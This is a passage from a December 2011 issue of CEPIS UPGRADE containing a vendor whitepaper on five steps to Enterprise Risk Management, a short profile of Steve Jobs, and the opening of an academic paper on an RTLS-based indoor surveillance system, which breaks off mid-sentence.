90
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Five Steps to Enterprise Risk Management
Val Jonas
With the changing business environment brought on by events such as the global financial crisis, gone are the days of
focussing only on operational and tactical risk management. Enterprise Risk Management (ERM), a framework for a
business to assess its overall exposure to risk (both threats and opportunities), and hence its ability to make timely and
well informed decisions, is now increasingly becoming the norm. Ratings agencies, such as Standard & Poors, are reinforcing this shift towards ERM by rating the effectiveness of a company’s ERM strategy as part of their overall credit
assessment. This means that, aside from being best practice, not having an efficient ERM strategy in place will have a
detrimental effect on a company’s credit rating. Not only do large companies need to respond to this new focus, but also
the public sector needs to demonstrate efficiency going forward, by ensuring ERM is embedded not only vertically but also
horizontally across their organisations. This whitepaper provides help, in the form of five basic steps to implementing a
simple and effective ERM solution.
Keywords: Enterprise Risk Management, Enterprise
Risk Map, Enterprise Risk Reporting, Enterprise Risk Structure, ERM, ERM Strategy, Horizontal Enterprise Risk Management, Left Shift, Risk Relationships, Scoring Systems,
Vertical Enterprise Risk Management, Vertical Management
Chain.
1 Introduction
With the changing business environment brought on by
events such as the global financial crisis, gone are the days
of focussing only on operational and tactical risk management. Enterprise Risk Management (ERM), a framework
for a business to assess its overall exposure to risk (both
threats and opportunities), and hence its ability to make
timely and well informed decisions, is now the norm.
Ratings agencies, such as Standard & Poors, are reinforcing this shift towards ERM by rating the effectiveness
of a company’s ERM strategy as part of their overall credit
assessment. This means that, aside from being best practice,
not having an efficient ERM strategy in place will have a
detrimental effect on a company’s credit rating.
Not only do large companies need to respond to this new
focus, but also the public sector needs to demonstrate efficiency going forward, by ensuring ERM is embedded not
only vertically but also horizontally across their organisations (Figure 1). This whitepaper1 provides help, in the form
of five basic steps to implementing a simple and effective
ERM solution.
2 Five Steps to implementing a Simple and Effective ERM Solution
The five steps to implementing a simple and effective
ERM solution are explained in this section.
Author
Val Jonas is a highly experienced risk management expert, with
extensive experience of training, facilitating and implementing
project, programme and strategic risk management systems for
companies in a wide range of industries in the UK, Europe,
USA and Australia. With more than 18 years experience in risk
management and analysis, working with large organisations,
Val has a wealth of practical experience and vision on how
organisations can improve project and business performance
through their risk management strategic framework and good
practice. Val played a major part in the design and development
of the leading Risk Management and Analysis software product
Predict!. More recently, she has pioneered Governance and Risk
Management Master Class sessions for senior management in
industry and government and has been a keen and active
participant in forging the interfacing of Risk and Earned Value
Management, including speaking at international conferences
on these topics. She has a joint honors BA in Mathematics and
Computing from Oxford University. <val.jonas@risk
decisions.com>.
About Risk Decisions
Risk Decisions Limited is part of Risk Decisions Group, a
pioneering global risk management solutions company, with
offices in the UK, USA and Australia. The company specialises
in the development and delivery of enterprise solutions and
services that enable risk to be managed more effectively on
large capital projects as well as helping users to meet strategic
business objectives and achieve compliance with corporate
governance obligations. Clients include Lend Lease, Mott
MacDonald, National Grid, Eversholt Rail, BAE Systems, Selex
Galileo, Raytheon, Navantia, UK MoD, Australian Defence
Materiel Organisation and New Zealand Air Force.
1
This is first of a series of whitepapers on Enterprise Risk Management. Future papers will expand on each of the steps in this white
paper as well as continuing to cover Governance and Compliance.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
91
Risk Management
Figure 1: Vertical and Horizontal ERM.
“
Enterprise Risk Management (ERM), is a framework for a
business to assess its overall exposure to risk
(both threats and opportunities)
”
Figure 2: Enterprise Risk Structure in the Predict! Hierarchy Tree.
92
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 3: Vertical Management Chain of Owners and Leaders.
Step 1 – Establish an Enterprise Risk Structure
ERM requires the whole organisation to identify, communicate and proactively manage risk, regardless of position or perspective. Everyone needs to follow a common
approach, which includes a consistent policy and process, a
single repository for their risks and a common reporting
Figure 4: Global Categories.
“
format. However, it is also important to retain existing working practices based on localised risk management perspectives as these reflect the focus of operational risk management.
The corporate risk register will look different from the
operational risk register, with a more strategic emphasis on
risks to business strategy, reputation and so on, rather than
more tactical product, contract and project focused risks.
The health and safety manager will identify different kinds
of risks from the finance manager, while asset risk management and business continuity are disciplines in their own
right. ERM brings together risk registers from different disciplines, allowing visibility, communication and central reporting, while maintaining distributed responsibility.
In addition to the usual vertical risk registers, such as
corporate, business units, departments, programmes and
projects, the enterprise also needs horizontal, or functional
risk registers. These registers allow function and business
managers, who are are responsible for identifying risks to
their own objectives, to identify risks arising from other
areas of the organisation.
The enterprise risk structure (Figure 2) should match
the organisation’s structure: the hierarchy represents vertical (executive) as well as horizontal (functional and business) aspects of the organisation. This challenges the conventional assumption that risks can be rolled up automati-
Aside from being best practice, not having
an efficient ERM strategy in place will have a detrimental
effect on a company’s credit rating
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
93
Risk Management
Figure 5: Scoring by Cluster Maps from Local to Enterprise Level.
“
Also the public sector needs to demonstrate efficiency
going forward, by ensuring ERM is embedded vertically
and also horizontally across their organisations
”
Figure 6: Metrics Reports by Business Objective, Cluster and Supplier.
94
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 7: Robust Risk Information for Decision-making.
cally, by placing horizontal structures side by side with vertical executive structures. Risks should be aggregated using
a combination of vertical structure and horizontal intelligence. This is a key factor in establishing ERM.
Step 2 – Assign Responsibility
Once an appropriate enterprise risk structure is established, assigning responsibility and ownership should be
straightforward. Selected nodes in the structure will have
specified objectives; each will have an associated manager
(executive, functional or business), who will be responsible
for achieving those objectives and managing the associated
risks. Each node containing a set of risks, along with its
owner and leader, is a Risk Management Cluster. (See Figure 3.)
Vertical managers take executive responsibility not only
for their cluster risk register, but also overall leadership responsibility for the Risk Management Clusters2 below. Responsibility takes two forms: ownership at the higher level
and leadership at the lower level. For example, a programme
manager will manage his programme risks, but also have
responsibility for overseeing risk within each of the programme’s projects.
Budgetary authority (setting and using Management
Reserve), approval of risk response actions, communication of risk appetite, management reporting and risk performance measures are defined as part of the Owner and
Leader roles as illustrated in Figure 3. This structure is also
used to escalate and delegate risks.
2
Risk Management Clusters® are unique to the Predict! risk management software.
© Novática
Farewell Edition
Horizontal managers take responsibility for their own
functional or business Risk Management Clusters, but also
for gathering risks from other areas of the Enterprise Risk
Structure related to their discipline. For example, the HR
functional manager will be responsible for identifying common skills shortfall risks to bring them under central management. Similarly, the business continuity manager will
identify all local risks relating to use of a test facility and
manage them under one site management plan. To assist in
this, we use an enterprise risk map – see Step 3.
Step 3 – Create an Enterprise Risk Map
Risk budgeting and common sense dictates that risks
should reside at their local point of impact, because this is
where attention is naturally focused. However, the risk
cause, mitigation or exploitation strategy may come from
elsewhere in the organisation and often common causes and
actions can be identified. In this case, we take a systemic
approach, where risks are managed more efficiently when
brought together at a higher level. To achieve this, we need
to be able to map risks to different parts of the risk management structure.
“
ERM requires the whole
organisation to identify,
communicate and proactively
manage risk
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
95
Risk Management
To create an enterprise risk map, you need:
„ a set of global categories to communicate information to the right place
„ the facility to define the relationships between risks
(parent, child, sibling etc)
„ scoring systems with consistent common impact
types
Global Categories
Functional and business managers should use these global categories to map risks to common themes, such as strategic or business objectives, functional areas and so on.
These categories then provide ways to search and filter on
these themes and to bring common risks together under a
parent risk. (See Figure 4).
Risk Relationships
For example, if skills shortage risks are associated with
HR, the HR manager can easily call up a register of all the
HR risks, regardless of project, contract, asset, etc. across
the organisation and manage them collectively.
Similarly, the impact of a supplier failing on any one
contract may be manageable. But across many contracts
could be a major business risk. In which case, the supply
chain function needs to bring the risks against this supplier
together and to manage the problem centrally.
Each Risk Management Cluster will include both global and local categories in a Predict! Group, so that each
area of the organisation needs only to review relevant information.
Scoring systems are also applied by Risk Management
Cluster, with locally meaningful High, Medium and Low
thresholds which map automatically when rolled up (Figure 5). For example, a High impact of £150k at project or
contract level will appear as Low at corporate level. Whereas
a £5m risk at a project or contract level may appear as High
at the corporate level.
Typically, financial and reputation impacts will be common to all clusters, whereas local impacts, such as project
schedule, will not be visible higher up.
Step 4 – Decision Making through Enterprise Risk
Reporting
The most important aspect of risk management is carrying out appropriate actions to manage the risks. However, you cannot manage every identified risk, so you need
to prioritise and make decisions on where to focus management attention and resources. The decision making process is underpinned by establishing risk appetite against objectives and setting a baseline, both of which should be
recorded against each Risk Management Cluster®.
Enterprise-wide reporting allows senior managers to review risk exposure and trends across the organisation. This
is best achieved through metrics reports, such as the risk
histogram (see Figure 6). For example, you might want to
review the risk to key business objectives by cluster. Or
how exposed different contracts and projects are to various
suppliers.
Furthermore, there is a need to use a common set of
reports across the organisation, to avoid time wasted interpreting unfamiliar formats (Figure 7). Such common reports ensure the risk is communicated and well understood
by all elements of the organisation, and hence provide timely
information on the current risk position and trends, initially
top-down, then drilling down to the root cause.
Step 5 – Changing Culture from Local to Enterprise
At all levels of an organisation, changing the emphasis
Figure 8: Proactive Management of Risks – looking ahead.
96
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
“
ERM delivers confidence, stability, improved
performance and profitability
”
from ‘risk management’ to ‘managing risks’ is a challenge;
however, across the enterprise it is particularly difficult. It
requires people to look ahead and take action to avert (or
exploit) risk to the benefit of the organisation. It also requires the organisation to encourage and reward this change
in emphasis!
Unfortunately, problem management (fire-fighting) deals
with today’s problems at the expense of future ones. This is
generally a far more expensive process as the available remedies are limited. However, if potential problems are identified (as risks) before they arise, you have far more options
available to affect a ‘Left Shift: from a costly and overly
long process to one better matching the original objectives
set! (See Figure 8.)
Most organisations have pockets of good risk management, many have a mechanism to report ‘top N’ risks vertically, but very few have started to implement horizontal,
functional or business risk management. Both a bottom up
and top down approach is required. An ERM initiative should
allow good local practices to continue, provided they are in
line with enterprise policy and process (establishing each
pocket of good risk management as a Risk Management
Cluster will provide continuity).
From a top-down perspective, functional and business
focused risk management needs to be kick started. A risk
steering group comprising functional heads and business
managers is a good place to start. The benefits of such a
group getting together to understand inter-discipline risk
helps break down stove-piped processes. This can trigger
increasingly relaxed cross-discipline discussions and focus
on aligning business and personal objectives that leads to
rapid progress on understanding and managing risk.
Finally, to ensure that an organisational culture shift is
affected, the senior management must be engaged. This engagement is not only aimed at encouraging them to see the
benefits of managing risk, but to also help the organisation
as a whole see that proactive management of risk (the Left
Shift principle) is valued by all.
A Risk Management MasterClass for the executive board
and senior managers can provide them with the tools necessary to progress an organisation towards effective ERM.
3 The Benefits
ERM delivers confidence, stability, improved performance and profitability. It provides:
„ Access to risk information across the organisation in
real time
„ Faster decision making and less ‘fire fighting’
„ Fewer surprises (managed threats and successful
opportunities)
„ Improved confidence and trust across the stakeholder
community
© Novática
Farewell Edition
„
Reduced cost, better use of resources and improved
morale
„ Stronger organisations resilient to change, ready to
exploit new opportunities
Over time this will:
„ Increase customer satisfaction, enhance reputation
and generate new business
„ Safeguard life, company assets and the environment
„ Achieve best value and maximise profits
„ Maintain credit ratings and lower finance costs
4 Summary
All of the risk management skills and techniques required to implement Enterprise Risk Management can easily be learned and applied. From senior managers to risk
practitioners, Masterclasses, training, coaching and process definition can be used to support rollout of Enterprise
Risk Management.
Create a practical Enterprise Risk Structure, set clear
responsibilities and hold people accountable. Define a simple risk map and provide localised working practices to
match perspectives on risk. Be seen to make decisions based
on good risk management information.
Enterprise Risk Management should be simple to
understand and simple to implement.
Keep it simple! Make it effective!
Bibliography
„ AS/NZS 4360:2004 Risk management. SAI Global Ltd,
ISBN 0-7337-5904-1, 2004.
„ Association of Project Management. Project Risk Analysis
and Management Guide, Second Edition. Association of
Project Management, ISBN: 1-903494-12-5, 2004.
„ COSO. Enterprise Risk Management - Integrated Framework, AICPA, 2004.
„ Office of Government Commerce. Management of Risk:
Guidance for Practitioners Book, The Stationary Office,
ISBN 13: 9780113310388, 2007.
„ Project Management Institute. Practice Standard for
Project Risk Management. Project Management Institute, 2009.
„ ISO 31000: Risk management – Principles and Guidelines. ISO, <http://www.iso.org>, 2009.
„ ISO/FDIS 31000:2009.
„ ISO Guide 73 – Risk management - Vocabulary
Note: All of these publications are listed at<http://www.
riskdecisions.com>.
Glossary
Note: Where ‘source’ is in brackets, minor amendments have been
incorporated to the original definition.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
97
Risk Management
Term
Budget
Change Control
(Management)
Control Account
Cost Benefit Analysis
Cost Risk Analysis
Enterprise Risk Map
Enterprise Risk
Management (ERM)
Left Shift
Management Reserve (MR)
Non-specific Risk Provision
Operational Risk
Opportunity
Baseline
Performance Measurement
Proactive Risk Response
Risk Response Activities
An action or set of actions to reduce the probability or impact of a
threat or increase the probability or impact of an opportunity. If
approved they are carried out in advance of the occurrence of the
risk. They are funded from the project budget.
An action or set of actions to be taken after a risk has occurred in
order to reduce or recover from the effect of the threat or to
exploit the opportunity. They are funded from Management
Reserve.
The amount of risk exposure an organisation is willing to accept
in connection with delivering a set of objectives.
An uncertain event or set of circumstances, that should it or they
occur, would have an effect on the achievement of one or more
objectives.
The difference between the total impact of risks should they all
occur and the Risk Provision.
Functionality in Risk Decisions’ Predict! risk management
software that enables users to organise different groups of risks
to form a single, enterprise-wide risk map.
The amount of budget / schedule / resources set aside to
manage the impact of risks Risk provision is a component part of
Management Reserve
Activities carried out to implement a Proactive Risk Response.
Schedule Risk Analysis
Assessment and synthesis of schedule risks and/or estimating
Reactive Risk Response
Risk Appetite
Risk Event
Risk Exposure
Risk Management Clusters
Risk Provision
98
Definition
The resource estimate (in £/$s or hours) assigned for the
accomplishment of a specific task or group of tasks.
Identifying, documenting, approving or rejecting and controlling
change.
A management control point at which actual costs can be
accumulated and compared to earned value and budgets
(resource plans) for management control purposes. A control
account is a natural management point for budget/schedule
planning and control since it represents the work assigned to one
responsible organisational element on one Work Breakdown
Structure (WBS) element.
The comparison of costs before and after taking an action, in
order to establish the saving achieved by carrying out that action.
Assessment and synthesis of the cost risks and/or estimating
uncertainties affecting the project to gain an understanding of
their individual significance and their combined impact on the
project’s objectives, to determine a range of likely outcomes for
project cost.
The structure used to consolidate risk information across the
organisation, to identify central responsibility and common
response actions, with the aim of improving top down visibility
and managing risks more efficiently.
The application of risk management across all areas of a
business, from contracts, projects, programmes, facilities, assets
and plant, to functions, financial, business and corporate risk.
The practice by which an organisation takes proactive action to
mitigate risks when they are identified rather than when they
occur with the aim of reducing cost and increase efficiency.
Management Reserve may be subdivided into:
•
Specific Risk provision to manage identifiable and
specific risks
•
Non-Specific Risk Provision to manage emergent risks
•
Issues provision
The amount of budget / schedule / resources set aside to cover
the impact of emergent risks, should they occur.
The different types of risks managed across an organisation,
typically excluding financial and corporate risks.
An ‘upside’, beneficial Risk Event.
An approved scope/schedule/budget plan for work, against which
execution is compared, to measure and manage performance.
The objective measurement of progress against the Baseline
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
Source
Risk Decisions
(PMBoK)
APM EVM guideline
Risk Decisions
(PRAM)
Risk Decisions
Risk Decisions
Risk Decisions
APM EV/Risk
Working Group
APM EV/Risk
working group
Risk Decisions
PRAM
(PMBoK)
APM EV/Risk
Working Group
(PRAM)
(PRAM)
APM EV/Risk
Working Group
PRAM
APM EV/Risk
Working Group
Risk Decisions
APM EV/Risk
Working Group
APM EV/Risk
Working Group
(PRAM)
© Novática
UPENET
Information Society
Steve Jobs
Dragana Stojkovic
© 2011 JISA
This paper was first published, in English, by inforeview, issue 5/2011, pp. 58-63. inforeview, a UPENET partner, is a publication
from the Serbian CEPIS society JISA (Jedinstveni informatièki savez Srbije – Serbian Information Technology Association). The 5/
2011 issue of inforeview can be accessed at <http://www.emagazine.inforeview.biz/si9/index.html>.
Note: Abstract and keywords added by UPGRADE.
This paper offers a review of the role played by the late Steve Jobs in the development and commercialization of trendy and
innovative IT devices (Mac computer, iPod, iPhone, iPad) that have greatly influenced the daily lives of hundreds of
millions of people around the world.
Keywords: Apple, Innovation, IT
Devices, Steve Jobs.
Although many considered him to
be the best innovator in the technological world, Steve Jobs was never such
a skilled engineer as he was able to
recognize a good idea and do everything necessary to realize it and bring
it to perfection. Even he himself honoured his long-time partner Steve
Wozniak, with whom he founded the
company Apple Computer, for his ingenious engineering skills. However,
although Steve Wozniak was the man
who was the most responsible for the
construction of the first revolutionary
computer Apple I, as he said, the idea
of selling them never crossed his mind
at the time. Jobs was the one who gathered resources, organized production,
and assembled a great team of successful managers.
“
© CEPIS
After the success of Apple II, the
next generation of the computer, the
inventor of the famous Macintosh computer (also known as Mac) Jef Raskin
insisted that Apple team, led by Jobs,
visit the company Xerox PARC which
were working on the greatest innovations of that time at their premises –
the graphic user interface and computer mouse. However, what people from
Xerox did not know was how to realize their idea, and how to preserve it.
Recognizing the ingeniousness of these
creations, Jobs immediately made his
team work on the development of implementation of the idea in the next
generations of Apple computers, Lisa
and Macintosh.
When mentioning Macintosh, it is
hard to find a tech savvy or a marketing expert who has not heard of the
"1984", the famous commercial that
this computer was presented with in the
Author
Dragana Stojkovic has a Bachelor
Degree in Philology, English language
and literature branch, at the University
of Belgrade, Serbia. She is a free lance
journalist and English translator.
<[email protected]>
USA during the Super Bowl in 1984.
What is less known is that the Board
of Directors did not like the commercial at all, and that Jobs was the one
who supported the project until its very
realization. After the premier broadcast, all three major TV networks of
the time and around 50 local TV stations broadcasted their reports about
the commercial, and hundreds of newspapers and magazines wrote about it,
providing publicity worth 5 million
dollars for free.
Although many considered him to be the best innovator
in the technological world,
Steve Jobs was never such a skilled engineer
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 99
UPENET
“
After the dispute within the company, Jobs left Apple and founded his
own computer company called NeXT.
When 12 years later Apple bought
NeXT and brought Jobs back, what he
found was a company that was slowly
dying since major companies such as
Microsoft, IBM, and Dell had produced the same machines as Apple did,
but at a lower cost and with faster processors. Visiting Apples premises,
across from the main building in a
basement, Jobs found a designer who
was sitting between a bunch of prototypes and thinking about quitting.
Among the prototypes he had been
working on was a monolithic monitor
with soft edges and integrated components. In that room did Jobs see that
other managers had missed. Almost
immediately, he said to the designer,
Jonathan Ive, that from that moment
on, they would be working on a new
line of computers. That was when the
first iMacs were born.
The next device that directed the
development of high technology, this
time in the consumer electronics field,
was certainly the famous iPod. Considering existing digital music players
to be either too big or too small but
“
During his life
he enjoyed the status
of a rock star
100
”
useless, and their software completely
inadequate, Jobs engaged a team of
engineers which would design a complete line of iPods. The first model was
presented in 2001 and it was the size
of a deck of cards, which at the time
was a really great progress, storing up
to 1000 songs, while the battery lasted
amazing 10 hours. And, of course, the
whole story about iPod devices would
not have any sense without the existence of iTunes Music Store announced
in 2003, which caused a revolution in
the mass distribution of digital content.
It might be needless to say how
much iPhone has affected the development of smartphones since 2007
with its revolutionary design and user
interface. It is enough to mention that
it did not have a worthy competitor at
the market for years, and even today
the fans of Apple ecosystem would not
exchange it for a model of another
company. However, the path from the
idea to the final product was immensely
demanding and difficult, especially for
the engineers. It is known that Jobs
broke at least three iPhone prototypes
into pieces before he was finally satisfied.
The iPhone has literally changed
the appearance of the mobile phone
and caused fast growth of smartphones
and subsequently the tablet PCs. Great
interest in the tablet market was caused
by Apple’s iPad which borrowed the
OS and interface from the iPhone. At
first observed with a dose of scepticism
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Jobs was the one
who knew how to
spin an idea
”
as a useless device which was nothing
but enlarged iPod touch, iPad has
quickly become the best-selling tablet
PC ever. If it is about the belief that
your creation will be something extraordinary, then Jobs was certainly the
greatest believer, at least in the tech
world.
Jobs was frequently asked to comment on his vision. Once, for the
American magazine Fortune in January 2000, he said:
"This is what customers pay us for
– to sweat all these details so it’s easy
and pleasant for them to use our computers. We’re supposed to be really
good at this. That doesn’t mean we
don’t listen to customers, but it’s hard
for them to tell you what they want
when they’ve never seen anything remotely like it. Take desktop video editing. I never got one request from someone who wanted to edit movies on his
computer. Yet now that people see it,
they say, ‘Oh my God, that’s great!’"
During his life he enjoyed the status of a rock star thanks to his interesting life story, eccentric behaviour, and
unmistaken vision when it comes to
products of the future. It is certain that
there is a whole team of engineers,
designers, and loyal associates standing behind his success, however, Jobs
was the one who knew how to spin an
idea.
Farewell Edition
© CEPIS
UPENET
Surveillance Systems
An Intelligent Indoor Surveillance System
Rok Piltaver, Erik Dovgan, and Matjaz Gams
© Informatica, 2011
This paper was first published, in English, by Informatica (Vol. 35, issue no. 3, 2011, pp. 383-390). Informatica, <http://
www.informatica.si/> is a quarterly journal published, in English, by the Slovenian CEPIS society SDI (Slovensko Drustvo
Informatika – Slovenian Society Informatika, <http://www.drustvo-informatika.si/>).
The development of commercial real-time location system (RTLS) enables new ICT solutions. This paper presents an
intelligent surveillance system for indoor high-security environments based on RTLS and artificial intelligence methods.
The system consists of several software modules each specialized for detection of specific security risks. The validation
shows that the system is capable of detecting a broad range of security risks with high accuracy.
Keywords: Expert System, Fuzzy
Logic, Intelligent System, Real-Time
Locating System, Surveillance.
1 Introduction
Security of people, property, and
data is becoming increasingly important in today’s world. Security is ensured by physical protection and technology, such as movement detection,
biometric sensors, surveillance cameras, and smart cards. However, the
crucial factor of most security systems
is still a human [7], providing the intelligence to the system. The security
personnel has to be trustworthy, trained
and motivated, and in good psychically
and physical shape. Nevertheless, they
are still human and as such tend to
make mistakes, are subjective and biased, get tired, and can be bribed. For
example, it is well known that a person watching live surveillance video
often becomes tired and may therefore
overlook a security risk. Another problem is finding trustworthy security personnel in foreign countries where locals are the only candidates for the job.
With that in mind there is an opportunity of using the modern information-communication technology in
conjunction with methods of artificial
intelligence to mitigate or even eliminate the human shortcomings and increase the level of security while lowering the overall security costs. Our
© CEPIS
Authors
Rok Piltaver received his B.Sc. degree
in Computer Science from the University
of Ljubljana, Slovenia, in 2008. He is a
research assistant at the Department of
Intelligent Systems of the Jozef Stefan
Institute, Ljubljana, and a Ph.D. student
of New media and e-science at the Jozef
Stefan International Postgraduate
School where he is working on his
dissertation on combining accurate and
understandable classifiers. His research
interests are in artificial intelligence and
machine learning with applications in
ambient intelligence and ambient assisted
living. He published two papers in
international scientific journals and eight
papers in international conferences and
was awarded for the best innovation in
Slovenia in 2009 and for the best joint
project between business and academia
in 2011. <[email protected]>
Erik Dovgan received his B.Sc. degree
in Computer Science from the University
of Ljubljana, Slovenia, in 2008. He is a
research assistant at the Department of
Intelligent Systems of the Jozef Stefan
Institute, Ljubljana, and a Ph.D. student
of New media and e-science at the Jozef
Stefan International Postgraduate School
where he is working on his dissertation
on multiobjective optimization of vehicle
control strategies. His research interests
are in evolutionary algorithms, stochastic
multiobjective optimization, classification
algorithms, clustering and application of
these techniques in energy efficiency,
Farewell Edition
transportation, security systems and
ambient assisted living. <erik.dovgan@
ijs.si>
Matjaz Gams is Head of Department of
Intelligent Systems at the Jozef Stefan
Institute and professor of computer
science at the University of Ljubljana and
MPS, Slovenia. He received his degrees
at the University of Ljubljana and MPS.
He is or was teaching at 10 Faculties in
Slovenia and Germany. His professional
interest includes intelligent systems, artificial intelligence, cognitive science,
intelligent agents, business intelligence
and information society. He is member of
numerous international program
committees of scientific meetings,
national strategic boards and institutions,
editorial boards of 11 journals and is
managing director of the Informatica
journal. He was co-founder of various
societies in Slovenia, e.g. the Engineering
Academy, AI Society, Cognitive Society,
and was president and/or secretary of
various societies including ACM
Slovenia. He is president of institute and
faculty union members in Slovenia. He
headed several national and international
projects including the major national
employment agent on the Internet first to
present over 90% of all available jobs in
a country. His major scientific
achievement is the discovery of the
principle of multiple knowledge. In 2009
his team was awarded for the best
innovation in Slovenia and in 2011 for the
best joint project between business and
academia. <[email protected]>
CEPIS UPGRADE Vol. XII, No. 5, December 2011 101
UPENET
“
This paper presents an intelligent surveillance system
for indoor high-security environments
first intelligent security system that is
focused on the entry control is described in [5]. In this paper we present
a prototype of an intelligent indoorsurveillance system (i.e. it works in the
whole indoor area and not only at the
entry control) that automatically detects security risks.
The prototype of an intelligent security system, called "Poveljnikova
desna roka" (PDR, eng. commander’s
right hand), is specialized for surveillance of personnel, data containers, and
important equipment in indoor highsecurity areas (e.g., an archive of classified data with several rooms). The
system is focused on the internal
threats; nevertheless it also detects external security threats. It detects any
unusual behaviour based on user-defined rules and automatically extracted
models of the usual behaviour. The artificial intelligence methods enable the
PDR system to model usual and to recognize unusual behaviour. The system
is capable of autonomous learning, reasoning and adaptation. The PDR system alarms the supervisor about unusual and forbidden activities, enables
an overview of the monitored environment, and offers simple and effective
analysis of the past events. Tagging all
personnel, data containers, and important equipment is required as it enables
real-time localization and integration
with automatic video surveillance. The
PDR system notifies the supervisor
with an alarm of appropriate level and
an easily comprehensible explanation
in the form of natural language sentences, tagged video recordings and
graphical animations. The PDR system
detects intrusions of unidentified persons, forbidden actions of known and
unknown persons and unusual activities of tagged entities. The concrete
scenarios detected by the system include thefts, sabotages, staff negligence and insubordination, unauthorised entry, unusual employee behaviour and similar incidents.
102
”
The rest of the paper is structured
as follows. Section 2 summarizes the
related work. An overview of software
modules and a brief description of used
sensors are given in Section 3. Section
4 describes the five PDR modules, including the Expert System Module and
Fuzzy Logic Module in more detail.
Section 5 presents system verification
while Section 6 provides conclusions.
2 Related Work
There has been a lot of research in
the field of automatic surveillance
based on video recordings. The research ranges from extracting low level
features and modelling of the usual
optical flow to methods for optimal
camera positioning and evaluating of
automatic video surveillance systems
[8]. There are many operational implementations of such system increasing
the security in public places (subway
stations, airports, parking lots).
On the other hand, there has not
been much research in the field of automatic surveillance systems based on
real-time locating systems (RTLS), due
to the novelty of sensory equipment.
Nevertheless, there are already some
simple commercial systems with so
called room accuracy RTLS [20] that
enable tracking of objects and basic
alarms based on if-then rules [18].
Some of them work outdoors using
GPS (e.g., for tracking vehicles [21])
while others use radio systems for indoor tracking (e.g., in hospitals and
warehouses). Some systems allow
video monitoring in combination with
RTLS tracking [19].
Our work is novel as it uses several
complex artificial intelligence methods
to extract models of the usual behaviour
and detect the unusual behaviour based
on an indoor RTLS. In addition, our work
also presents the benefits of combining
video and RTLS surveillance.
3 Overview of the PDR System
This section presents a short over-
CEPIS UPGRADE Vol. XII, No. 5, December 2011
view of the PDR system. The first subsection presents the sensors and hardware used by the system. The second
subsection introduces software modules. Subsection 3.3 describes RTLS
data pre-processing and primitive routines.
3.1Sensors and other Hardware
The PDR system hardware includes
a real-time locating system (RTLS),
several IP video cameras (Figure 1), a
processing server, network infrastructure, and optionally one or more
workstations, such as personal computers, handheld devices, and mobile
phones with internet access, which are
used for alerting the security personnel.
RTLS provides the PDR system
with information about locations of all
personnel and important objects (e.g.
container with classified documents) in
the monitored area. RTLS consists of
sensors, tags, and a processing unit
(Figure 1). The sensors detect the distance and the angle at which the tags
are positioned. The processing unit
uses these measurements to calculate
the 3D coordinates of the tags. Commercially available RTLS use various
technologies: infrared, optical, ultrasound, inertial sensors, Wi-Fi, or ultrawideband radio. The technology determines RTLS accuracy (1 mm – 10 m),
update frequency (0.1 Hz – 120 Hz),
covered area (6 – 2500 m2), size and
weight of tags and sensors, various
limitations (e.g., required line of sight
between sensors and tags), reliability,
and price (2.000 – 150.000 •) [13].
PDR uses Ubisense RTLS [15] that is
based on the ultra-wide band technology and is among the more affordable
RTLSs. It uses relatively small and
energy efficient active tags, has an update rate of up to 9 Hz and accuracy of
±20 cm in 3D space given good conditions. It covers areas of up to 900 m2
and does not require line of sight.
The advantages of a RTLS are that
people feel more comfortable being
Farewell Edition
© CEPIS
UPENET
are Statistic, Macro and Fuzzy Logic
Modules. The Statistic Module collects
statistic information about entity movement such as time spent walking, sitting, lying etc. The Macro model is
based on macroscopic properties such
as the usual time of entry in certain
room, day of the week etc. Both modules analyse relatively long time intervals while the Fuzzy Logic Module
analyses short intervals. It uses fuzzy
discretization to represent short actions
and fuzzy logic to infer whether they
are usual or not.
Figure 1: Overview of the PDR System.
tracked by it than being filmed by video
cameras and that localization with a
RTLS is simpler, more accurate, and
more robust than localization from
video streams. On the other hand,
RTLS is not able to locate objects that
are not marked with tags. Therefore,
the most vital areas need to be monitored by video cameras also in order
to detect intruders that do not wear
RTLS tags. However, only one PDR
module requires video cameras, while
the other four depend on RTLS alone.
Moreover, the cameras enable on-camera processing, therefore only extracted
features are sent over the network.
3.2 Software Structure
The PDR software is divided into
five modules. Each of them is specialized for detecting a certain kind of abnormal behaviour (i.e., a possible se-
“
© CEPIS
curity risk) and uses an appropriate
artificial intelligence method for detecting it. The modules reason in real
time independently of each other and
asynchronically trigger alarms about
detected anomalies. Three of the PDR
modules are able to learn automatically
while the other two use predefined
knowledge and knowledge entered by
the supervisor. The Video Module detects persons without tags and is the
only module that needs video cameras.
The Expert System Module is
customisable by the supervisor, who
enters information about forbidden
events and actions in the form of simple rules, thus enabling automatic rule
checking. The three learning modules
that automatically extract models of the
usual behaviour for each monitored
entity and compare current behaviour
with it in order to detect abnormalities
3.3 RTLS Data Pre-processing
and Primitive Routines
Since the used RTLS has relatively
low accuracy and relatively high update rate, a two-stage data filtering is
used to increase the reliability and to
mitigate the negative effect of the noisy
location measurements. In the first
stage, median filter [1] with window
size 20 is used to filter sequences of x,
y, and z coordinates of tags. Equation
(1) gives the median filter equation for
direction x. The median filter is used
to correct the RTLS measurements that
differ from the true locations by more
than ~1.5 m and occur in up to 2.5 %
of measurements. Such false measurements are relatively rear and occur only
in short sequences (e.g., probability of
more than 5 consecutive measurements
having a high error is very low) therefore the median filter corrects these
errors well.
~
xn = med {xn −10 , xn − 9 ,
,..., xn + 8 , xn + 9 }
(1)
The second stage uses a Kalman
filter [6] that performs the following
three tasks: smoothing of the RTLS
measurements, estimating the velocities of tags, and predicting the missing
measurements. Kalman filter state is a
six dimensional vector that includes
positions and velocities in each of the
three dimensions. The new state is cal-
The system is capable of detecting a broad range
of security risks with high accuracy
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 103
UPENET
“
The crucial factor of most security systems is still
